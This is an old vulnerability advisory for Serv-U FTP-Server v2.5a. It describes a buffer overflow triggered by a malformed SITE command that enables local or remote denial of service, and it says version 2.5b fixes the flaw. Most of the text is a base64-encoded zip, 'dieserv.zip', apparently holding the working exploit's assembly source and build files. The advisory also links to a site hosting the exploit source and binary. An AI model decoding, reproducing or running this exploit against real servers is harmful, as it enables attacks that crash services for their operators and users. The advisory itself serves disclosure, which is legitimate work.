COMMAND

    Serv-U FTP-Server

SYSTEMS AFFECTED

    Serv-U FTP-Server v2.5a

PROBLEM

    UssrLabs  found  a  Local/Remote  DoS  Attack in Serv-U FTP-Server
    v2.5a.   The  buffer  overflow  is  caused  by a bad Formed (SITE)
    command.  For  the source /  binary of this  remote / local  D.O.S
    go to:

        http://www.ussrback.com/servu/

    Thanks  to  dark  spyrit  for  letting  UssrLabs  know about this.
    Mimed source follows:

    ---
    Content-Type: application/octet-stream; name="dieserv.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="dieserv.zip"
    Content-MD5: jcij2fH6yy3xse5VPu/ksg==

    UEsDBBQAAgAIAIE1gic1PmQvVQYAAOUXAAAGAAAATVkuQVNN7Vh7b9s2EP9bBvwdbsWArKji
    2kqTBm7XwUvSpUCLBvXSDigKgxZpWylNaiKV2Pn0u6MelhQ5TdMWA4YZMOQ73vN31B3pZ79+
    x0+38wzGOk1CAdP1EM7H43fwmk2Nl30AIJO5urrqpcYkUxZ+7oV6Cff9OHPfN4Nup7d3eBB3
    O1KHTJpu5yJdxvjoLTUXEmaSWR+M5bgoSVqsbKK8P4Q90sslU/x1pMRoePbu7VFlbWz5Ka5J
    UVv4kERWHGlltGyonKwie5boUBhT1xiPxpYlNo1r7FArJUJb4xmheI2RiPCyaexICqYaxhYW
    I6qb0uFnUbeOSdoJ4zypxyG1ETXpkwKBN5qnUmQgjLysekNoCFHKIzSKaXutMtLYRAo1aq5i
    eTizjH4c6Xhd3SJ8Cg/GIrncPYeXf57t0k+RwGXQ22c+HAsVMQl6BsSPQvHAh8EefvvdjueR
    qtvHxiQPfOQTu7kFSWimEzDZvg81F4DkNFIsWcNcg9VDWFgbDx8/bu77xwa9po9z27d5ODds
    LobAI0EqcKqNfRWD1PNIQcyMudIJr8TeZuJkxZaxrBgJ+vu9J4eHvSdPewcQWbMUMAj2nhTR
    9DMspeeJv1P4eZcIAvgclScuTcmmQsJ0bUWrx50UJWHHD/qLr/222ruXHYphIoWa2wVwDk+7
    nTOE627xE7AYf58v/D77l+IvilvPAUvz4fjLScDx77BjIisgNlecShGc+jvlM3w3Gp/uFNuu
    sFh4Aio7fbD0+RI57nauDOPChEkU20grEneiwf6BWzNrMzGW2dSUS4PgkBQ/jEf0loKxSRpa
    FH4vEoMmgF/Bb0ieRvNFnWWujzeeCMObvh8NgKcx/PLbQxIfr40Vy7Fzn8vX46mKR2/Yauy6
    lcn9Eeecx8fznJbxe6G4Tl6pmc5ZRRLIN5QUtTtqhJNIlYmZSE1mbBnJdZEHMmKd2ApJOlTN
    nLwWiaaAD7Pw+g/rlgtvlD95z6NwulARzLRyuypdTpkRRFGBF9rYM5awpbALkbgduX+wQWOa
    zmYiyYT7mygy9iDn31gIbi4gjJOQKTvJx1L2Mr3EcOUQY02SNUSAAjt+8HTh71go5KwGu4gM
    UKA/lfuybkxC1o3qXHI6RowiNT9ZxVJHudOcB8e9t70xEGI9/JSm6yqF6TrX5aNCmfKsufeQ
    IF4YLmh+W6EIAdcsVTbecrrb6WXvjKGJPex2vJVOPMFWPn4LaorUtKQ4UrykQqTCkjKRj99S
    EileUtMYrcRInaVm4e0OBvjziElZO3og742+9D6WcX7yT0Z/ITfMJasHGGQvUZj8QBauIzEk
    2B1sGg16d08mffyiVEwBZJElIlbXngmZmSKltPWybGId5xJkkjRdo2vIcxHm8s6xoTicUriM
    Pep2ENsEPuLCJ5pU3oVAF5MwS2EiMYdNlKjing21zC0qYkUTsRTKMkwt1MpGKhVUMClYBkH9
    1cmCpcAo1MILCrtnq0JhNRjeGhYvwipkLpRwz02ImzXkFQ43TCrADSZGmkli/arlK/ls1VqF
    Qk6JeaG/YZp0WhoNNmzGuXt+rEzeT35NM9YxbI/R5Fu7Fdfy8PFov70KhRlOQ7OCap/1+aLF
    G89fqx8Eav8bQB20gNo4Dnw/YMtT0TZgZ0rHXw1zAZyezYywkE+vok/0B/3BomhAm6tNpVPm
    vSfrKu4n1se7G9NZzS4jeRchotrOTKR6m1HtQ9BexGDAt15AnwGN9RbH7hZFQ6DmiYR92ESa
    43KjvTgT5R3rhhli1rAx0bUAQ+O/ZrfCodwLw+XQ9OowX1wXS5FWWNjPkZoj211TJ/k9FZ7n
    thsz/gU8bw7qF2RyGXuY00Qo7sZo0WeHzTcum20XriUWzbKqcVOhupXreoHrt/U8hrfuKveT
    TjENALMzThuGdJveJuwEiqvqVgDz8xYhh0EQWs2p2hpr89WqtNmt713ZNdsyMa42dwNni/38
    jLgdpy/qNSAr5G9DbvCtyDV66dYoy9b4Q9EL7olecD/0ggp6xoq4+kZ+FYqNa+PWaDd3yG0g
    3h5283iP4Td48sWPLkQGVfA/VHeFau+/AVW3k8+wYes43fzrWTnM5H+tdjuzSDE5EavIltr9
    Qq7yP2+307i/DLdODvcXJ0bq/p4rxiwd0UpP3Q4GC+7iSdH/A1BLAwQUAAIACABVNIInHviY
    1WAAAAByAAAACAAAAE1BS0UuQkFUS7aKKUkszo1JyswDM4yNFPRzc4DYWEG/SkG/UCG3kpcL
    RVFOZl42UJVuhYJ+SEGqgn6ygn5iAVCZXn5Slk5KZmpxalGZjo5CZm5BflGJsZFeTmYSL1dK
    ao6CFkgFLxcAUEsDBBQAAgAIAGe8VifRm+4XowAAADkBAAAIAAAAQ09ERS5JTkNtj82qwjAQ
    hfeC7zAP4MK9Kw0WN/WKFFyIlNBOiJCbCcmk+Pg2Nf0BzWZ+8jHnnJt/MtaCbCCDUMrGE1CF
    L94AneN/TaoWWvqwXgFcYtD7sSnGBrbw/XZgXHfFgL7DdiJJqYAMTaOTLKPN5LyY0aX4dLQH
    Kxosz2Ay+0v9EJVCP3H3PuNJ2tbgY8HpnPwvsoucYCGNgUEif30Skyty7eejbcs3UEsBAhQA
    FAACAAgAgTWCJzU+ZC9VBgAA5RcAAAYAAAAAAAAAAQAgAAAAAAAAAE1ZLkFTTVBLAQIUABQA
    AgAIAFU0gice+JjVYAAAAHIAAAAIAAAAAAAAAAEAIAAAAHkGAABNQUtFLkJBVFBLAQIUABQA
    AgAIAGe8VifRm+4XowAAADkBAAAIAAAAAAAAAAEAIAAAAP8GAABDT0RFLklOQ1BLBQYAAAAA
    AwADAKAAAADIBwAAAAA=

    -----

SOLUTION

    This has been fixed in 2.5b.